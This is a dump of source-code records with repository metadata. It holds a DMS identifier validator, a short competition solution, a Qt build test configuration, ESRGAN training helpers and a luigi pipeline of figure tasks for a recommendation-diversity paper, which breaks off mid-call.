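#   - only alphanumeric characters or hyphens, 255 characters at most
#   - no two consecutive hyphens anywhere in the string
_IDENTIFIER_RE = re.compile(r"^[A-Za-z](?!.*--)[A-Za-z0-9-]{0,254}$")


def is_valid_task_identifier(identifier: str) -> bool:
    """Return True if the string satisfies the documented DMS constraints."""
    if not _IDENTIFIER_RE.match(identifier):
        return False
    # The pattern allows a trailing hyphen, so reject it explicitly.
    return not identifier.endswith("-")
```

Validating locally gives a clearer error than waiting for the service to reject the request.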
d97e4bfcd7394ef338b784b2c291e3c2d4b3c1dd | 100 | py | Python | Boleh Code Python Nationals/L1-3 Herd Immunity.py | jaredliw/ppkomp-python-solutions | ecb92f3de27100f37595ef31fd46eccd984b84f7 | [
"MIT"
] | 1 | 2021-04-09T13:58:03.000Z | 2021-04-09T13:58:03.000Z | Boleh Code Python Nationals/L1-3 Herd Immunity.py | jaredliw/ppkomp-python-solutions | ecb92f3de27100f37595ef31fd46eccd984b84f7 | [
"MIT"
] | null | null | null | Boleh Code Python Nationals/L1-3 Herd Immunity.py | jaredliw/ppkomp-python-solutions | ecb92f3de27100f37595ef31fd46eccd984b84f7 | [
"MIT"
] | null | null | null | print("YES" if int(input()) / int(input()) >= 0.95 and int(input()) / int(input()) > 0.8 else "NO")
| 50 | 99 | 0.56 | 18 | 100 | 3.111111 | 0.611111 | 0.571429 | 0.392857 | 0.571429 | 0.607143 | 0 | 0 | 0 | 0 | 0 | 0 | 0.058824 | 0.15 | 100 | 1 | 100 | 100 | 0.6 | 0 | 0 | 0 | 0 | 0 | 0.05 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 7 |
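The golfed one-liner above reads four integers from stdin and compares two ratios against fixed thresholds. An equivalent named-variable version for readability — the function name and the meaning assigned to each input are our reading of the task, not stated in the source:

```python
def herd_immunity(vaccinated_a: int, population_a: int,
                  vaccinated_b: int, population_b: int) -> str:
    """Mirror the one-liner: first ratio must reach 95%, second must exceed 80%."""
    first_ok = vaccinated_a / population_a >= 0.95
    second_ok = vaccinated_b / population_b > 0.8
    return "YES" if first_ok and second_ok else "NO"

# The original reads the four values from stdin, one per line:
# print(herd_immunity(int(input()), int(input()), int(input()), int(input())))
```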
d98e75400809cd153545e180e1edf58c01942265 | 2,334 | py | Python | tests/bamtests.py | markfinal/bam-qt | e71189dbbfc932d9ba46ead37630fba2b40a432a | [
"BSD-3-Clause"
] | 1 | 2015-09-19T11:40:03.000Z | 2015-09-19T11:40:03.000Z | tests/bamtests.py | markfinal/bam-qt | e71189dbbfc932d9ba46ead37630fba2b40a432a | [
"BSD-3-Clause"
] | 2 | 2018-05-20T07:34:03.000Z | 2018-05-20T14:19:24.000Z | tests/bamtests.py | markfinal/bam-qt | e71189dbbfc932d9ba46ead37630fba2b40a432a | [
"BSD-3-Clause"
] | null | null | null | from testconfigurations import TestSetup, visualc, visualc64, visualc32, mingw32, gcc, gcc64, gcc32, clang, clang32, clang64
def configure_repository():
    """Return a mapping from test name to its platform/compiler TestSetup."""
    configs = {}
#configs["Qt4Test1"] = TestSetup(win={"Native":[visualc64],"VSSolution":[visualc64],"MakeFile":[visualc64,mingw32]})
configs["Qt5Test1"] = TestSetup(win={"Native": [visualc64, visualc32, mingw32], "VSSolution": [visualc64, visualc32], "MakeFile": [visualc64, visualc32, mingw32]},
linux={"Native": [gcc64, gcc32], "MakeFile": [gcc64, gcc32]},
osx={"Native": [clang64, clang32], "MakeFile": [clang64, clang32], "Xcode": [clang64, clang32]})
configs["Qt5Test2"] = TestSetup(win={"Native": [visualc64, visualc32, mingw32], "VSSolution": [visualc64, visualc32], "MakeFile": [visualc64, visualc32, mingw32]},
linux={"Native": [gcc64, gcc32], "MakeFile": [gcc64, gcc32]},
osx={"Native": [clang64, clang32], "MakeFile": [clang64, clang32], "Xcode": [clang64, clang32]})
configs["Qt5Test3"] = TestSetup(win={"Native": [visualc64, visualc32, mingw32], "VSSolution": [visualc64, visualc32], "MakeFile": [visualc64, visualc32, mingw32]},
linux={"Native": [gcc64, gcc32], "MakeFile": [gcc64, gcc32]},
osx={"Native": [clang64, clang32], "MakeFile": [clang64, clang32], "Xcode": [clang64, clang32]})
configs["Qt5Test4"] = TestSetup(win={"Native": [visualc64, visualc32, mingw32], "VSSolution": [visualc64, visualc32], "MakeFile": [visualc64, visualc32, mingw32]},
linux={"Native": [gcc64, gcc32], "MakeFile": [gcc64, gcc32]},
osx={"Native": [clang64, clang32], "MakeFile": [clang64, clang32], "Xcode": [clang64, clang32]})
configs["Qt5WebBrowsingTest"] = TestSetup(win={"Native": [visualc64, visualc32, mingw32], "VSSolution": [visualc64, visualc32], "MakeFile": [visualc64, visualc32, mingw32]},
linux={"Native": [gcc64, gcc32], "MakeFile": [gcc64, gcc32]},
osx={"Native": [clang64, clang32], "MakeFile": [clang64, clang32], "Xcode": [clang64, clang32]})
return configs
| 106.090909 | 177 | 0.577978 | 191 | 2,334 | 7.057592 | 0.167539 | 0.21365 | 0.204006 | 0.120178 | 0.788576 | 0.788576 | 0.788576 | 0.788576 | 0.788576 | 0.788576 | 0 | 0.121092 | 0.246358 | 2,334 | 21 | 178 | 111.142857 | 0.645253 | 0.049272 | 0 | 0.526316 | 0 | 0 | 0.151037 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.052632 | false | 0 | 0.052632 | 0 | 0.157895 | 0 | 0 | 0 | 0 | null | 1 | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
5c217dcfff1dd01425cbf3b5ff787512dadeeb66 | 3,751 | py | Python | modules/train.py | onordberg/multispectral-super-resolution | ca3c5f961bf015a5e54ed1d23ae11ec9d429ea8a | [
"MIT"
] | null | null | null | modules/train.py | onordberg/multispectral-super-resolution | ca3c5f961bf015a5e54ed1d23ae11ec9d429ea8a | [
"MIT"
] | null | null | null | modules/train.py | onordberg/multispectral-super-resolution | ca3c5f961bf015a5e54ed1d23ae11ec9d429ea8a | [
"MIT"
] | 1 | 2022-02-10T13:21:21.000Z | 2022-02-10T13:21:21.000Z | from modules.logging import *
def pretrain_esrgan(generator,
ds_train_dict,
epochs,
steps_per_epoch,
initial_epoch=0,
validate=False,
ds_val_dict=None,
val_steps=250,
model_name=None,
tag=None,
log_tensorboard=False,
tensorboard_logs_dir='logs/tb/',
save_models=False,
models_save_dir='logs/models',
save_weights_only=True,
log_train_images=False,
n_train_image_batches=1,
log_val_images=False,
n_val_image_batches=1):
    """Pre-train the ESRGAN generator and log the run via EsrganLogger."""
    logger = EsrganLogger(
model=generator,
model_name=model_name,
tag=tag,
pretrain_or_gan='pretrain',
log_tensorboard=log_tensorboard,
tensorboard_logs_dir=tensorboard_logs_dir,
save_models=save_models,
models_save_dir=models_save_dir,
save_weights_only=save_weights_only,
validate=validate,
val_steps=val_steps,
ds_val_dict=ds_val_dict, # dict of dataset(s)
log_train_images=log_train_images,
n_train_image_batches=n_train_image_batches,
ds_train_dict=ds_train_dict, # dict of dataset(s)
log_val_images=log_val_images,
n_val_image_batches=n_val_image_batches)
callbacks = logger.get_callbacks()
print('Callbacks:', callbacks)
ds_train = list(ds_train_dict.values())[0]
history = generator.fit(ds_train,
epochs=epochs,
steps_per_epoch=steps_per_epoch,
initial_epoch=initial_epoch,
callbacks=callbacks)
return history
def gan_train_esrgan(esrgan_model,
ds_train_dict,
epochs,
steps_per_epoch,
initial_epoch=0,
validate=False,
ds_val_dict=None,
val_steps=250,
model_name=None,
tag=None,
log_tensorboard=False,
tensorboard_logs_dir='logs/tb/',
save_models=False,
models_save_dir='logs/models',
save_weights_only=True,
log_train_images=False,
n_train_image_batches=1,
log_val_images=False,
n_val_image_batches=1):
    """Run the adversarial (GAN) training phase of ESRGAN and log the run."""
    logger = EsrganLogger(
model=esrgan_model,
model_name=model_name,
tag=tag,
pretrain_or_gan='gan',
log_tensorboard=log_tensorboard,
tensorboard_logs_dir=tensorboard_logs_dir,
save_models=save_models,
models_save_dir=models_save_dir,
save_weights_only=save_weights_only,
validate=validate,
val_steps=val_steps,
ds_val_dict=ds_val_dict, # dict of dataset(s)
log_train_images=log_train_images,
n_train_image_batches=n_train_image_batches,
ds_train_dict=ds_train_dict, # dict of dataset(s)
log_val_images=log_val_images,
n_val_image_batches=n_val_image_batches)
callbacks = logger.get_callbacks()
print('Callbacks:', callbacks)
ds_train = list(ds_train_dict.values())[0]
history = esrgan_model.fit(ds_train,
epochs=epochs,
steps_per_epoch=steps_per_epoch,
initial_epoch=initial_epoch,
callbacks=callbacks)
return history
| 36.067308 | 63 | 0.552653 | 400 | 3,751 | 4.7275 | 0.1375 | 0.044421 | 0.046536 | 0.057113 | 0.931782 | 0.931782 | 0.931782 | 0.931782 | 0.931782 | 0.892649 | 0 | 0.006063 | 0.384431 | 3,751 | 103 | 64 | 36.417476 | 0.812906 | 0.019995 | 0 | 0.903226 | 0 | 0 | 0.018796 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.021505 | false | 0 | 0.010753 | 0 | 0.053763 | 0.021505 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
5c242b41a90a20d8ee34bdb03228ac98ebf5fafa | 28,631 | py | Python | automation/paper.py | grodino/recodiv | 1fb72cd728f75441bdcd0f2af78b87a8c791799e | [
"MIT"
] | null | null | null | automation/paper.py | grodino/recodiv | 1fb72cd728f75441bdcd0f2af78b87a8c791799e | [
"MIT"
] | null | null | null | automation/paper.py | grodino/recodiv | 1fb72cd728f75441bdcd0f2af78b87a8c791799e | [
"MIT"
] | null | null | null | from typing import List
import luigi
from luigi import task
from automation.config import *
from automation.msd_dataset import *
def paper_figures(n_users: int, name: str) -> List[luigi.Task]:
    """Build the list of luigi tasks that generate the paper's figures."""
    msd_dataset = MsdDataset(name, n_users=n_users)
tasks = []
# General information about the dataset
tasks += [
DatasetInfo(dataset=msd_dataset),
PlotUsersDiversitiesHistogram(dataset=msd_dataset, alpha=0),
PlotUsersDiversitiesHistogram(dataset=msd_dataset, alpha=2),
PlotUsersDiversitiesHistogram(dataset=msd_dataset, alpha=float('inf')),
PlotUserVolumeHistogram(dataset=msd_dataset),
PlotTagsDiversitiesHistogram(dataset=msd_dataset, alpha=0),
PlotTagsDiversitiesHistogram(dataset=msd_dataset, alpha=2),
PlotTagsDiversitiesHistogram(dataset=msd_dataset, alpha=float('inf')),
]
# General information about the train and test sets
tasks += [
TrainTestInfo(dataset=msd_dataset),
PlotTrainTestUsersDiversitiesHistogram(dataset=msd_dataset, alpha=0),
PlotTrainTestUsersDiversitiesHistogram(dataset=msd_dataset, alpha=2),
PlotTrainTestUsersDiversitiesHistogram(dataset=msd_dataset, alpha=float('inf')),
]
# Model convergence plot
tasks += [
PlotTrainLoss(
dataset=msd_dataset,
model_n_iterations=2*N_ITERATIONS,
model_n_factors=3_000,
model_regularization=float(1e6),
model_confidence_factor=CONFIDENCE_FACTOR
),
PlotTrainLoss(
dataset=msd_dataset,
model_n_iterations=3*N_ITERATIONS,
model_n_factors=200,
model_regularization=float(1e-3),
model_confidence_factor=CONFIDENCE_FACTOR
),
PlotTrainLoss(
dataset=msd_dataset,
model_n_iterations=3*N_ITERATIONS,
model_n_factors=1_000,
model_regularization=float(1e6),
model_confidence_factor=CONFIDENCE_FACTOR
),
]
# User recommendations evaluation scores
tasks += [
# Best model found
PlotUserEvaluationHistogram(
dataset=msd_dataset,
model_n_iterations=N_ITERATIONS,
model_n_factors=OPT_N_FACTORS,
model_regularization=OPT_REGULARIZATION,
n_recommendations=N_RECOMMENDATIONS
),
PlotUserEvaluationHistogram(
dataset=msd_dataset,
model_n_iterations=N_ITERATIONS,
model_n_factors=OPT_N_FACTORS,
model_regularization=OPT_REGULARIZATION,
n_recommendations=500
),
PlotUserEvaluationHistogram(
dataset=msd_dataset,
model_n_iterations=N_ITERATIONS,
model_n_factors=OPT_N_FACTORS,
model_regularization=OPT_REGULARIZATION,
n_recommendations=1_000
),
# 200 factors
PlotUserEvaluationHistogram(
dataset=msd_dataset,
model_n_iterations=N_ITERATIONS,
model_n_factors=200,
model_regularization=100.0,
n_recommendations=N_RECOMMENDATIONS
),
]
# Hyper parameter tuning
tasks += [
PlotModelTuning(
dataset=msd_dataset,
model_n_iterations=N_ITERATIONS,
model_n_factors_values=N_FACTORS_VALUES,
model_regularization_values=REGULARIZATION_VALUES,
model_confidence_factor=CONFIDENCE_FACTOR,
tuning_metric='ndcg',
tuning_best='max',
n_recommendations=N_RECOMMENDATIONS
),
PlotModelTuning(
dataset=msd_dataset,
model_n_iterations=N_ITERATIONS,
model_n_factors_values=N_FACTORS_VALUES,
model_regularization_values=REGULARIZATION_VALUES,
model_confidence_factor=CONFIDENCE_FACTOR,
tuning_metric='test_loss',
tuning_best='min',
n_recommendations=N_RECOMMENDATIONS
),
PlotModelTuning(
dataset=msd_dataset,
model_n_iterations=N_ITERATIONS,
model_n_factors_values=N_FACTORS_VALUES,
model_regularization_values=REGULARIZATION_VALUES,
model_confidence_factor=CONFIDENCE_FACTOR,
tuning_metric='train_loss',
tuning_best='min',
n_recommendations=N_RECOMMENDATIONS
),
PlotModelTuning(
dataset=msd_dataset,
model_n_iterations=N_ITERATIONS,
model_n_factors_values=N_FACTORS_VALUES,
model_regularization_values=REGULARIZATION_VALUES,
model_confidence_factor=CONFIDENCE_FACTOR,
tuning_metric='recip_rank',
tuning_best='max',
n_recommendations=N_RECOMMENDATIONS
),
PlotModelTuning(
dataset=msd_dataset,
model_n_iterations=N_ITERATIONS,
model_n_factors_values=N_FACTORS_VALUES,
model_regularization_values=REGULARIZATION_VALUES,
model_confidence_factor=CONFIDENCE_FACTOR,
tuning_metric='precision',
tuning_best='max',
n_recommendations=N_RECOMMENDATIONS
),
]
# Model performance for different number of latent factors
tasks += [
PlotModelEvaluationVsLatentFactors(
dataset=msd_dataset,
model_n_iterations=N_ITERATIONS,
model_n_factors_values=N_FACTORS_VALUES,
model_regularization=OPT_REGULARIZATION,
model_confidence_factor=CONFIDENCE_FACTOR,
n_recommendations=N_RECOMMENDATIONS
)
]
# Recommendation diversity histogram at equilibrium (optimal parameters)
tasks += [
# Herfindal
PlotRecommendationsUsersDiversitiesHistogram(
dataset=msd_dataset,
model_n_iterations=N_ITERATIONS,
model_n_factors=OPT_N_FACTORS,
model_regularization=OPT_REGULARIZATION,
n_recommendations=N_RECOMMENDATIONS,
alpha=2
),
# Richness
PlotRecommendationsUsersDiversitiesHistogram(
dataset=msd_dataset,
model_n_iterations=N_ITERATIONS,
model_n_factors=OPT_N_FACTORS,
model_regularization=OPT_REGULARIZATION,
n_recommendations=N_RECOMMENDATIONS,
alpha=0
),
# Berger-Parker
PlotRecommendationsUsersDiversitiesHistogram(
dataset=msd_dataset,
model_n_iterations=N_ITERATIONS,
model_n_factors=OPT_N_FACTORS,
model_regularization=OPT_REGULARIZATION,
n_recommendations=N_RECOMMENDATIONS,
alpha=float('inf')
),
# Herfindal
PlotRecommendationsUsersDiversitiesHistogram(
dataset=msd_dataset,
model_n_iterations=N_ITERATIONS,
model_n_factors=OPT_N_FACTORS,
model_regularization=OPT_REGULARIZATION,
n_recommendations=10,
alpha=2
),
# Richness
PlotRecommendationsUsersDiversitiesHistogram(
dataset=msd_dataset,
model_n_iterations=N_ITERATIONS,
model_n_factors=OPT_N_FACTORS,
model_regularization=OPT_REGULARIZATION,
n_recommendations=10,
alpha=0
),
# Berger-Parker
PlotRecommendationsUsersDiversitiesHistogram(
dataset=msd_dataset,
model_n_iterations=N_ITERATIONS,
model_n_factors=OPT_N_FACTORS,
model_regularization=OPT_REGULARIZATION,
n_recommendations=10,
alpha=float('inf')
),
# Herfindal
PlotRecommendationsUsersDiversitiesHistogram(
dataset=msd_dataset,
model_n_iterations=N_ITERATIONS,
model_n_factors=OPT_N_FACTORS,
model_regularization=OPT_REGULARIZATION,
n_recommendations=500,
alpha=2
),
# Richness
PlotRecommendationsUsersDiversitiesHistogram(
dataset=msd_dataset,
model_n_iterations=N_ITERATIONS,
model_n_factors=OPT_N_FACTORS,
model_regularization=OPT_REGULARIZATION,
n_recommendations=500,
alpha=0
),
# Berger-Parker
PlotRecommendationsUsersDiversitiesHistogram(
dataset=msd_dataset,
model_n_iterations=N_ITERATIONS,
model_n_factors=OPT_N_FACTORS,
model_regularization=OPT_REGULARIZATION,
n_recommendations=500,
alpha=float('inf')
),
]
# Diversity increase histogram at equilibrium
tasks += [
# Herfindal
PlotDiversitiesIncreaseHistogram(
dataset=msd_dataset,
model_n_iterations=N_ITERATIONS,
model_n_factors=OPT_N_FACTORS,
model_regularization=OPT_REGULARIZATION,
n_recommendations=N_RECOMMENDATIONS,
alpha=2
),
# Herfindal
PlotDiversitiesIncreaseHistogram(
dataset=msd_dataset,
model_n_iterations=N_ITERATIONS,
model_n_factors=OPT_N_FACTORS,
model_regularization=OPT_REGULARIZATION,
n_recommendations=10,
alpha=2
),
# Herfindal
PlotDiversitiesIncreaseHistogram(
dataset=msd_dataset,
model_n_iterations=N_ITERATIONS,
model_n_factors=OPT_N_FACTORS,
model_regularization=OPT_REGULARIZATION,
n_recommendations=500,
alpha=2
),
]
# Recommendation diversity increase vs organic diversity at equilibrium and variations
tasks += [
# Herfindal
PlotUserDiversityIncreaseVsUserDiversity(
dataset=msd_dataset,
alpha=2,
model_n_iterations=N_ITERATIONS,
model_n_factors=OPT_N_FACTORS,
model_regularization=OPT_REGULARIZATION,
n_recommendations=50,
bounds=[0, 75, -40, 40],
users=[
'165300f45335433b38053f9b3617cc4eadaa2ecf',
'767153bf012dfe221b8bd8d45aa7d649aa37845a',
'e6cdf0de3904fc6f40171a55eaa871503593cb06',
'c0d9b4c9ca33db5a3a90fcf0072727ee0758a9c0',
],
show_colorbar=False
),
PlotUserDiversityIncreaseVsUserDiversity(
dataset=msd_dataset,
alpha=2,
model_n_iterations=N_ITERATIONS,
model_n_factors=OPT_N_FACTORS,
model_regularization=OPT_REGULARIZATION,
n_recommendations=500,
bounds=[0, 75, -40, 40],
users=[
'165300f45335433b38053f9b3617cc4eadaa2ecf',
'767153bf012dfe221b8bd8d45aa7d649aa37845a',
'e6cdf0de3904fc6f40171a55eaa871503593cb06',
'c0d9b4c9ca33db5a3a90fcf0072727ee0758a9c0',
],
show_colorbar=False
),
PlotUserDiversityIncreaseVsUserDiversity(
dataset=msd_dataset,
alpha=2,
model_n_iterations=N_ITERATIONS,
model_n_factors=OPT_N_FACTORS,
model_regularization=OPT_REGULARIZATION,
n_recommendations=10,
bounds=[0, 75, -40, 40],
users=[
'165300f45335433b38053f9b3617cc4eadaa2ecf',
'767153bf012dfe221b8bd8d45aa7d649aa37845a',
'e6cdf0de3904fc6f40171a55eaa871503593cb06',
'c0d9b4c9ca33db5a3a90fcf0072727ee0758a9c0',
],
show_colorbar=False
),
# Richness
PlotUserDiversityIncreaseVsUserDiversity(
dataset=msd_dataset,
alpha=0,
model_n_iterations=N_ITERATIONS,
model_n_factors=OPT_N_FACTORS,
model_regularization=OPT_REGULARIZATION,
n_recommendations=50,
bounds=[-25, 800, -10, 1_000],
users=[
'165300f45335433b38053f9b3617cc4eadaa2ecf',
'767153bf012dfe221b8bd8d45aa7d649aa37845a',
'e6cdf0de3904fc6f40171a55eaa871503593cb06',
'c0d9b4c9ca33db5a3a90fcf0072727ee0758a9c0',
],
show_colorbar=True
),
PlotUserDiversityIncreaseVsUserDiversity(
dataset=msd_dataset,
alpha=0,
model_n_iterations=N_ITERATIONS,
model_n_factors=OPT_N_FACTORS,
model_regularization=OPT_REGULARIZATION,
n_recommendations=500,
bounds=[-15, 800, -10, 1_000],
users=[
'165300f45335433b38053f9b3617cc4eadaa2ecf',
'767153bf012dfe221b8bd8d45aa7d649aa37845a',
'e6cdf0de3904fc6f40171a55eaa871503593cb06',
'c0d9b4c9ca33db5a3a90fcf0072727ee0758a9c0',
],
show_colorbar=False
),
PlotUserDiversityIncreaseVsUserDiversity(
dataset=msd_dataset,
alpha=0,
model_n_iterations=N_ITERATIONS,
model_n_factors=OPT_N_FACTORS,
model_regularization=OPT_REGULARIZATION,
n_recommendations=10,
bounds=[-15, 800, -10, 1_000],
users=[
'165300f45335433b38053f9b3617cc4eadaa2ecf',
'767153bf012dfe221b8bd8d45aa7d649aa37845a',
'e6cdf0de3904fc6f40171a55eaa871503593cb06',
'c0d9b4c9ca33db5a3a90fcf0072727ee0758a9c0',
],
show_colorbar=False
),
# Berger-Parker
PlotUserDiversityIncreaseVsUserDiversity(
dataset=msd_dataset,
alpha=float('inf'),
model_n_iterations=N_ITERATIONS,
model_n_factors=OPT_N_FACTORS,
model_regularization=OPT_REGULARIZATION,
n_recommendations=50,
bounds=[0, 25, -25, 15],
users=[
'165300f45335433b38053f9b3617cc4eadaa2ecf',
'767153bf012dfe221b8bd8d45aa7d649aa37845a',
'e6cdf0de3904fc6f40171a55eaa871503593cb06',
'c0d9b4c9ca33db5a3a90fcf0072727ee0758a9c0',
],
show_colorbar=False
),
PlotUserDiversityIncreaseVsUserDiversity(
dataset=msd_dataset,
alpha=float('inf'),
model_n_iterations=N_ITERATIONS,
model_n_factors=OPT_N_FACTORS,
model_regularization=OPT_REGULARIZATION,
n_recommendations=500,
bounds=[0, 25, -25, 15],
users=[
'165300f45335433b38053f9b3617cc4eadaa2ecf',
'767153bf012dfe221b8bd8d45aa7d649aa37845a',
'e6cdf0de3904fc6f40171a55eaa871503593cb06',
'c0d9b4c9ca33db5a3a90fcf0072727ee0758a9c0',
],
show_colorbar=False
),
PlotUserDiversityIncreaseVsUserDiversity(
dataset=msd_dataset,
alpha=float('inf'),
model_n_iterations=N_ITERATIONS,
model_n_factors=OPT_N_FACTORS,
model_regularization=OPT_REGULARIZATION,
n_recommendations=10,
bounds=[0, 25, -25, 15],
users=[
'165300f45335433b38053f9b3617cc4eadaa2ecf',
'767153bf012dfe221b8bd8d45aa7d649aa37845a',
'e6cdf0de3904fc6f40171a55eaa871503593cb06',
'c0d9b4c9ca33db5a3a90fcf0072727ee0758a9c0',
],
show_colorbar=False
),
]
# Recommendation diversity vs organic diversity at equilibrium and variations
tasks += [
# Herfindal diversity
PlotRecommendationDiversityVsUserDiversity(
dataset=msd_dataset,
alpha=2,
model_n_iterations=N_ITERATIONS,
model_n_factors=OPT_N_FACTORS,
model_regularization=OPT_REGULARIZATION,
n_recommendations=N_RECOMMENDATIONS,
bounds=[None, 80, None, None]
),
# Richness
PlotRecommendationDiversityVsUserDiversity(
dataset=msd_dataset,
alpha=0,
model_n_iterations=N_ITERATIONS,
model_n_factors=OPT_N_FACTORS,
model_regularization=OPT_REGULARIZATION,
n_recommendations=N_RECOMMENDATIONS
),
# Berger-Parker
PlotRecommendationDiversityVsUserDiversity(
dataset=msd_dataset,
alpha=float('inf'),
model_n_iterations=N_ITERATIONS,
model_n_factors=OPT_N_FACTORS,
model_regularization=OPT_REGULARIZATION,
n_recommendations=N_RECOMMENDATIONS
),
]
# Recommendation diversity vs recommendation volume at equilibrium
tasks += [
# Herfindal diversity
PlotDiversityVsRecommendationVolume(
dataset=msd_dataset,
alpha=2,
model_n_iterations=N_ITERATIONS,
n_factors_values=[5, 20, 500, 3_000],
model_regularization=OPT_REGULARIZATION,
n_recommendations_values=N_RECOMMENDATIONS_VALUES
),
# Richness
PlotDiversityVsRecommendationVolume(
dataset=msd_dataset,
alpha=0,
model_n_iterations=N_ITERATIONS,
n_factors_values=[5, 20, 500, 3_000],
model_regularization=OPT_REGULARIZATION,
n_recommendations_values=N_RECOMMENDATIONS_VALUES
),
# Berger-Parker
PlotDiversityVsRecommendationVolume(
dataset=msd_dataset,
alpha=float('inf'),
model_n_iterations=N_ITERATIONS,
n_factors_values=[5, 20, 500, 3_000],
model_regularization=OPT_REGULARIZATION,
n_recommendations_values=N_RECOMMENDATIONS_VALUES
),
]
    # Diversity increase vs recommendation volume at equilibrium
    # (assigned to `deprecated` rather than `tasks`, so these are not queued)
deprecated = [
PlotDiversityIncreaseVsRecommendationVolume(
dataset=msd_dataset,
alpha=0,
model_n_iterations=N_ITERATIONS,
n_factors_values=[5, 20, 500, 3_000],
model_regularization=OPT_REGULARIZATION,
n_recommendations_values=N_RECOMMENDATIONS_VALUES
),
PlotDiversityIncreaseVsRecommendationVolume(
dataset=msd_dataset,
alpha=2,
model_n_iterations=N_ITERATIONS,
n_factors_values=[5, 20, 500, 3_000],
model_regularization=OPT_REGULARIZATION,
n_recommendations_values=N_RECOMMENDATIONS_VALUES
),
PlotDiversityIncreaseVsRecommendationVolume(
dataset=msd_dataset,
alpha=float('inf'),
model_n_iterations=N_ITERATIONS,
n_factors_values=[5, 20, 500, 3_000],
model_regularization=OPT_REGULARIZATION,
n_recommendations_values=N_RECOMMENDATIONS_VALUES
),
]
# Recommendation diversity versus the number of latent factors used in the model
tasks += [
PlotRecommendationDiversityVsLatentFactors(
dataset=msd_dataset,
alpha=2,
model_n_iterations=N_ITERATIONS,
n_factors_values=N_FACTORS_VALUES,
model_regularization=OPT_REGULARIZATION,
n_recommendations_values=[10, 50, 500]
),
PlotRecommendationDiversityVsLatentFactors(
dataset=msd_dataset,
alpha=0,
model_n_iterations=N_ITERATIONS,
n_factors_values=N_FACTORS_VALUES,
model_regularization=OPT_REGULARIZATION,
n_recommendations_values=[10, 50, 500]
),
PlotRecommendationDiversityVsLatentFactors(
dataset=msd_dataset,
alpha=float('inf'),
model_n_iterations=N_ITERATIONS,
n_factors_values=N_FACTORS_VALUES,
model_regularization=OPT_REGULARIZATION,
n_recommendations_values=[10, 50, 500]
),
]
# Recommendation diversity versus the regularization factor used in the model
tasks += [
PlotDiversityVsRegularization(
dataset=msd_dataset,
model_n_iterations=N_ITERATIONS,
model_n_factors=OPT_N_FACTORS,
model_regularization_values=REGULARIZATION_VALUES,
n_recommendations=N_RECOMMENDATIONS
)
]
# Diversity increase versus the number of latent factors used in the model
tasks += [
# Herfindal
PlotDiversityIncreaseVsLatentFactors(
dataset=msd_dataset,
alpha=2,
model_n_iterations=N_ITERATIONS,
n_factors_values=N_FACTORS_VALUES,
model_regularization=OPT_REGULARIZATION,
n_recommendations=N_RECOMMENDATIONS
),
PlotDiversityIncreaseVsLatentFactors(
dataset=msd_dataset,
alpha=2,
model_n_iterations=N_ITERATIONS,
n_factors_values=N_FACTORS_VALUES,
model_regularization=OPT_REGULARIZATION,
n_recommendations=500
),
# Richness
PlotDiversityIncreaseVsLatentFactors(
dataset=msd_dataset,
alpha=0,
model_n_iterations=N_ITERATIONS,
n_factors_values=N_FACTORS_VALUES,
model_regularization=OPT_REGULARIZATION,
n_recommendations=N_RECOMMENDATIONS
),
PlotDiversityIncreaseVsLatentFactors(
dataset=msd_dataset,
alpha=0,
model_n_iterations=N_ITERATIONS,
n_factors_values=N_FACTORS_VALUES,
model_regularization=OPT_REGULARIZATION,
n_recommendations=500
),
# Berger-Parker
PlotDiversityIncreaseVsLatentFactors(
dataset=msd_dataset,
alpha=float('inf'),
model_n_iterations=N_ITERATIONS,
n_factors_values=N_FACTORS_VALUES,
model_regularization=OPT_REGULARIZATION,
n_recommendations=N_RECOMMENDATIONS
),
PlotDiversityIncreaseVsLatentFactors(
dataset=msd_dataset,
alpha=float('inf'),
model_n_iterations=N_ITERATIONS,
n_factors_values=N_FACTORS_VALUES,
model_regularization=OPT_REGULARIZATION,
n_recommendations=500
),
]
# Diversity increase versus the regularization factor used in the model
tasks += [
# Herfindal
PlotDiversityIncreaseVsRegularization(
dataset=msd_dataset,
alpha=2,
model_n_iterations=N_ITERATIONS,
model_n_factors=OPT_N_FACTORS,
model_regularization_values=REGULARIZATION_VALUES,
n_recommendations=N_RECOMMENDATIONS
),
# Richness
PlotDiversityIncreaseVsRegularization(
dataset=msd_dataset,
alpha=0,
model_n_iterations=N_ITERATIONS,
model_n_factors=OPT_N_FACTORS,
model_regularization_values=REGULARIZATION_VALUES,
n_recommendations=N_RECOMMENDATIONS
),
# Berger-Parker
PlotDiversityIncreaseVsRegularization(
dataset=msd_dataset,
alpha=float('inf'),
model_n_iterations=N_ITERATIONS,
model_n_factors=OPT_N_FACTORS,
model_regularization_values=REGULARIZATION_VALUES,
n_recommendations=N_RECOMMENDATIONS
),
]
# Compare the listened, recommended and reco+listened tags distributions
tasks += [
PlotUserTagHistograms(
dataset=msd_dataset,
user='165300f45335433b38053f9b3617cc4eadaa2ecf',
n_tags=20,
model_n_iterations=N_ITERATIONS,
model_n_factors=OPT_N_FACTORS,
model_regularization=OPT_REGULARIZATION,
n_recommendations=50,
),
PlotUserTagHistograms(
dataset=msd_dataset,
user='767153bf012dfe221b8bd8d45aa7d649aa37845a',
n_tags=20,
model_n_iterations=N_ITERATIONS,
model_n_factors=OPT_N_FACTORS,
model_regularization=OPT_REGULARIZATION,
n_recommendations=50,
),
PlotUserTagHistograms(
dataset=msd_dataset,
user='e6cdf0de3904fc6f40171a55eaa871503593cb06',
n_tags=20,
model_n_iterations=N_ITERATIONS,
